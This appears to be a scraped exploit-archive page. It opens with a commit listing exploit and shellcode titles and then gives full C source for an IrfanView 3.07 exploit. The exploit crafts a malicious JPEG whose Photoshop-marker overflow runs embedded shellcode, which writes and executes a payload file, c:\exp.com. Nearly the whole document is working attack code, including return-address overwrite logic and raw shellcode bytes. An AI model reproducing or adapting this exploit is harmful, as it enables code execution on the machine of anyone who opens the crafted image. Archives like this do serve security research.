880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
113 lines
No EOL
4.2 KiB
C
113 lines
No EOL
4.2 KiB
C
// source: https://www.securityfocus.com/bid/781/info
|
|
|
|
IrfanView32, a freeware image viewer, has a problem in the handling of Adobe Photoshop generated jpegs. If a .jpg file is opened for viewing that contains the Adobe Photoshop marker in the header (8BPS) followed by a long string, the program will crash. It is possible to insert code in the string for execution.
|
|
|
|
/*=============================================================================
|
|
Irfan View 3.07 Exploit
|
|
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
|
|
Written by UNYUN (shadowpenguin@backsection.net)
|
|
=============================================================================
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
#include <windows.h>
|
|
|
|
#define MAXBUF 0x22e0
|
|
#define RETADR 0x31E
|
|
#define FAKE_ADR 0x80101010 // Writable buffer pointer
|
|
|
|
#define JMPESP_ADR 0xbffca4f7 // You have to change this value
|
|
// for non-Japanese Windows98.
|
|
#define HEAD "8BPS\0"
|
|
|
|
unsigned char exploit_code[300]={
|
|
0xEB,0x4F,0x5F,0x32,0xC0,0x88,0x47,0x0A,0x88,0x47,0x10,0x88,0x47,0x17,0x88,0x47,
|
|
0x1E,0x88,0x47,0x23,0x88,0x47,0x26,0x88,0x47,0x2D,0x88,0x47,0x3C,0x57,0xB8,0x50,
|
|
0x77,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xDB,0xB3,0x0B,0x8B,0xC7,0x03,0xC3,0x50,
|
|
0x56,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xC8,0x33,0xDB,0xB3,0x24,0x8B,0xC7,
|
|
0x03,0xC3,0x50,0xB3,0x32,0x8B,0xC7,0x03,0xC3,0x50,0xFF,0xD1,0x89,0x47,0x2E,0xEB,
|
|
0x02,0xEB,0x71,0x33,0xDB,0xB3,0x18,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,
|
|
0xF7,0xBF,0xFF,0xD0,0x8B,0xC8,0x8B,0x47,0x2E,0x50,0x33,0xC0,0xB0,0x03,0x90,0x90,
|
|
0x50,0xB0,0x01,0x50,0x33,0xDB,0xB3,0x3D,0x03,0xDF,0x53,0xFF,0xD1,0x33,0xDB,0xB3,
|
|
0x11,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0x5F,
|
|
0x2E,0x53,0xFF,0xD0,0x33,0xDB,0xB3,0x27,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,
|
|
0x6E,0xF7,0xBF,0xFF,0xD0,0x33,0xDB,0xB3,0x32,0x8B,0xCF,0x03,0xCB,0x51,0xFF,0xD0,
|
|
0x33,0xDB,0x53,0xB3,0x1F,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,0xF7,0xBF,
|
|
0xFF,0xD0,0xFF,0xD0,0xE8,0x39,0xFF,0xFF,0xFF,0x00
|
|
};
|
|
|
|
// "exp.com"
|
|
unsigned char exploit_data[1000]={
|
|
0xb0,0x13,0xcd,0x10,0xb0,0x0f,0xfe,0xc0,0xb4,0x0c,0xcd,0x10,0x03,0xd1,0x41,0x3c,
|
|
0x20,0x77,0xf1,0xeb,0xf1,0x00
|
|
};
|
|
|
|
int GetProcAddress_fcp[4]={0x32,0x5e,0x88,0xbc};
|
|
|
|
char string_buffer[1000] ="msvcrt.dll_fopen_fclose_fwrite_exit_wb_system_****";
|
|
char filename[100] = "c:\\exp.com";
|
|
|
|
main(int argc,char *argv[])
|
|
{
|
|
unsigned char buf[MAXBUF],l1,l2;
|
|
unsigned int ip,p1,p2,i;
|
|
FILE *fp;
|
|
|
|
if (argc<2){
|
|
printf("usage : %s outputfile\n",argv[0]);
|
|
exit(1);
|
|
}
|
|
memset(buf,0x90,MAXBUF); buf[MAXBUF]=0;
|
|
memcpy(buf,HEAD,4);
|
|
|
|
ip=JMPESP_ADR;
|
|
buf[RETADR ]=ip&0xff;
|
|
buf[RETADR+1]=(ip>>8)&0xff;
|
|
buf[RETADR+2]=(ip>>16)&0xff;
|
|
buf[RETADR+3]=(ip>>24)&0xff;
|
|
buf[RETADR+6]=0xeb;
|
|
buf[RETADR+7]=0x04;
|
|
|
|
ip=FAKE_ADR;
|
|
buf[RETADR+8]=ip&0xff;
|
|
buf[RETADR+9]=(ip>>8)&0xff;
|
|
buf[RETADR+10]=(ip>>16)&0xff;
|
|
buf[RETADR+11]=(ip>>24)&0xff;
|
|
|
|
p1=(unsigned int)LoadLibrary;
|
|
p2=(unsigned int)GetProcAddress;
|
|
exploit_code[0x1f]=p1&0xff;
|
|
exploit_code[0x20]=(p1>>8)&0xff;
|
|
exploit_code[0x21]=(p1>>16)&0xff;
|
|
exploit_code[0x22]=(p1>>24)&0xff;
|
|
|
|
for (i=0;i<4;i++){
|
|
exploit_code[GetProcAddress_fcp[i] ]=p2&0xff;
|
|
exploit_code[GetProcAddress_fcp[i]+1]=(p2>>8)&0xff;
|
|
exploit_code[GetProcAddress_fcp[i]+2]=(p2>>16)&0xff;
|
|
exploit_code[GetProcAddress_fcp[i]+3]=(p2>>24)&0xff;
|
|
}
|
|
|
|
l1=strlen(filename)+strlen(string_buffer);
|
|
l2=strlen(exploit_data);
|
|
strcat(string_buffer,filename );
|
|
strcat(string_buffer,"_" );
|
|
strcat(string_buffer,exploit_data );
|
|
strcat(exploit_code, string_buffer );
|
|
exploit_code[0x1c] = l1;
|
|
exploit_code[0x6d] = l2;
|
|
exploit_code[0x77] = l1+1;
|
|
|
|
memcpy(buf+RETADR+12,exploit_code,strlen(exploit_code));
|
|
|
|
if ((fp=fopen(argv[1],"wb"))==NULL){
|
|
printf("Can not write file '%s'\n",argv[1]);
|
|
exit(1);
|
|
}
|
|
|
|
fwrite(buf,1,MAXBUF,fp);
|
|
fclose(fp);
|
|
printf("Done.\n");
|
|
return FALSE;
|
|
} |